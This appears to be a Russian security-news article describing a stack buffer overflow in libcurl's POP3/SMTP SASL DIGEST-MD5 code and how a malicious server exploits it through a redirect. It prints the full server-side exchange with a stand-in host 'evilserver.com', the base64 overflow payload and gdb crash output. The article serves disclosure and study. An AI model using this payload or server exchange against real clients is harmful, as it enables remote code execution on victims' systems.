Удалённое исполнение кода в libcurl

Рекомендуем почитать:

Xakep #299. Sysmon

Компания Volema обнаружила баг с переполнением буфера в обработчике POP3 и SMTP библиотеки libcurl последних версий (от 7.26.0), а также опубликовала код для удалённой эксплуатации этого бага.

Суть в том, что в процессе аутентификации SASL DIGEST-MD5 функция Curl_sasl_create_digest_md5_message() использует данные, получаемые с сервера, не проверяя при этом должны образом размер данных, но присоединяя их к локальному буферу фиксированного размера в стеке. Таким образом, если жертва посылает запросы к серверу злоумышленника, то сервер может ответить таким образом, что переполнит размер буфера и запустит на исполнение произвольный код в системе жертвы.

Вектор атаки выглядит таким образом. Жертва посылает обычный запрос с помощью libcurl.

GET / HTTP/1.0
Host: evilserver.com

Сервер отвечает:

HTTP/1.0 302 Found
Location: pop3://x:x@evilserver.com/.

«Умный» libcurl подчиняется указанию на редирект и соединяется с evilserver.com по POP3 через TCP/110. Сервер отвечает.

+OK POP3 server ready

Curl посылает запрос.

CAPA

Сервер отвечает, что поддерживает только DIGEST-MD5.

+OK List of capabilities follows
SASL DIGEST-MD5
IMPLEMENTATION dumbydumb POP3 server

Libcurl принимает условия.

AUTH DIGEST-MD5

И сервер отгружает клиенту вредоносный код.

+ 
cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBI
ixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg=

Происходит переполнение буфера, поскольку тот имеет фиксированный размер.

realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",
algorithm=md5-sess,charset=utf-8

В gdb это выглядит так:

Program received signal SIGSEGV, Segmentation fault.
0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0  0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message ()
   from /home/kyprizel/test/curl-7.28.1/lib/.libs/libcurl.so.4
#2  0x4141414141414141 in ?? ()
...
#1469 0x4141414141414141 in ?? ()
#1470 0x656d616e72657375 in ?? ()
Cannot access memory at address 0x7fff63b8b000

Оригинальный эксплойт: pop3d.py.

Удалённое исполнение кода в libcurl

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Картинки в водопаде. Учимся рисовать изображения радиоволнами

Agent Tesla. Учимся реверсить боевую малварь в Ghidra

HTB Surveillance. Эксплуатируем инъекцию команд через скрипт ZoneMinder

Как работает EDR. Подробно разбираем механизмы антивирусной защиты

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Умный телевизор Hisense случайно вывел из строя Windows-компьютер владельца

Количество атак на мобильные устройства в России возросло в 5,2 раза

Microsoft: ATP28 эксплуатировала баг в Windows Print Spooler несколько лет

Малварь GuptiMiner распространялась через обновления антивируса eScan

Открыта регистрация на соревнования Киберколизей